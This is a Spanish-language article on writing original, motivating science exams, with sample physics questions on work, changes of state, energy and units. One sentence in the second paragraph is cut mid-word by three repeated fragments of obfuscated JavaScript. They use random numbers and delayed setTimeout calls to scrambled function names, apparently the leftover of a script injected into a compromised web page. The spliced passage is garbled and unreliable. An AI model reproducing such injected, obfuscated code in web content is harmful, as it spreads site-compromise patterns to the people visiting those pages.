UN EXAMEN ORIGINAL

 

Autor: Antonio Luis Merchán Vacas

 

 

Trata sobre la importancia de presentar pruebas escritas novedosas y motivadoras, que despierten el interés del alumnado y le ayuden a madurar como estudiante. Son muchos los tipos de ejercicios que se pueden proponer y todo dependerá de la dedicación y el interés del profesorado.


Ni que decir tiene que, en el momento en el que vivimos, es muy importante la motivación del alumnado. Esta motivación hay que trabajarla día a día en el aula, en el patio y demás instalaciones del centro educativo, pero también es muy importante motivar al alumnado cuandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando se enfrenta a una prueba escrita.


El profesorado tiene que buscar la forma de que al alumno le resulte atractivo y emocionante el hecho de hacer un examen escrito y que se sienta realizado y satisfecho después de acometerlo con éxito, por lo que es muy importante la forma de presentar un examen. Para ello hay una gran diversidad de maneras de elaborar un ejercicio, algunas de las cuales plasmaré a continuación:


En el siguiente ejemplo se muestra la diferencia entre dos formas de valorar un concepto físico como es el trabajo. Para ver si el alumno ha entendido este contenido se le puede preguntar de distintas maneras:


– ¿Qué es el trabajo?


– ¿Qué trabajo realiza una persona que ejerce una fuerza de 10 N sobre una caja que se desplaza 20 m en la dirección y sentido de la fuerza?


– Explica si en las siguientes situaciones se realiza trabajo





Con la tercera forma de hacer la pregunta se tiene que entender el concepto teórico de trabajo, suficiente para contestar a la primera pregunta, y se tiene que saber aplicar la fórmula matemática de forma cuantitativa, que bastaría para responder a la segunda pregunta, pero también hay que analizar las fuerzas que intervienen en las distintas situaciones, si existe movimiento y cuál es la dirección entre el vector fuerza y el vector desplazamiento. Con la tercera forma plantear la actividad además se promueve la educación en valores como el ejercicio físico, la higiene, la educación para la paz y el respeto por el medio ambiente, etc.


Otra forma de saber si el alumno ha adquirido los contenidos del tema trabajado sería mediante frases que tengan que justificar si son verdaderas o falsas. Por ejemplo, en la frase “Durante la fusión de una sustancia su temperatura aumenta” el alumnado tiene que saber cómo varía la temperatura con el calor y cómo varía la temperatura en un estado de agregación y en un cambio de estado, además de conocer la influencia del calor puesto en juego en el estado de vibración de las partículas. Sin embargo, si preguntas “¿que es la fusión?” el alumno respondería


con una simple frase que definiría este cambio de estado.


Pero este tipo de ejercicio también se pueden enfocar a problemas prácticos como “Un cuerpo de 1 Kg cae desde una altura de 100 m sobre un recipiente que contiene agua, cediéndole al agua una energía de 1000 J” en donde habrá que calcular el valor de la energía mediante la aplicación de la fórmula física correspondiente, o para el estudio de las unidades “La constante de la gravitación universal se mide en N.m2/Kg2” donde el alumno deducirá si estas unidades son


correctas o no a partir de la fórmula oportuna.


Una cuestión a tener en cuenta es que en la mayoría de los ejercicios que se proponen en las materias de ciencias lo único que se trabajan son la competencia matemática y la competencia en el conocimiento y la interacción con el mundo físico, pero también podemos valorar la competencia en comunicación lingüística y, dentro de ésta, la comprensión lectora mediante ejercicios que tengan un texto moderadamente largo. Por ejemplo: “El avión del presidente vuela a 300 Km/h, manteniendo su trayectoria horizontal, a 700 m sobre el Océano Pacífico. Ha encontrado un torbellino y el piloto recibe una información de que sólo puede cruzarlo si la masa del avión es mayor de 13000 Kg. ¿Podrá cruzarlo si la energía del avión es de 2.108 J?”


También se pueden presentar ejercicios en los exámenes en los que se tengan que interpretar o realizar gráficas. Es importante que el alumnado entienda lo que se representa en una gráfica ya que muchos datos de la vida cotidiana se presentan en gráficas o diagramas; además aparecen con cierta frecuencia en diversas materias como matemáticas, física y química o sociales entre otras.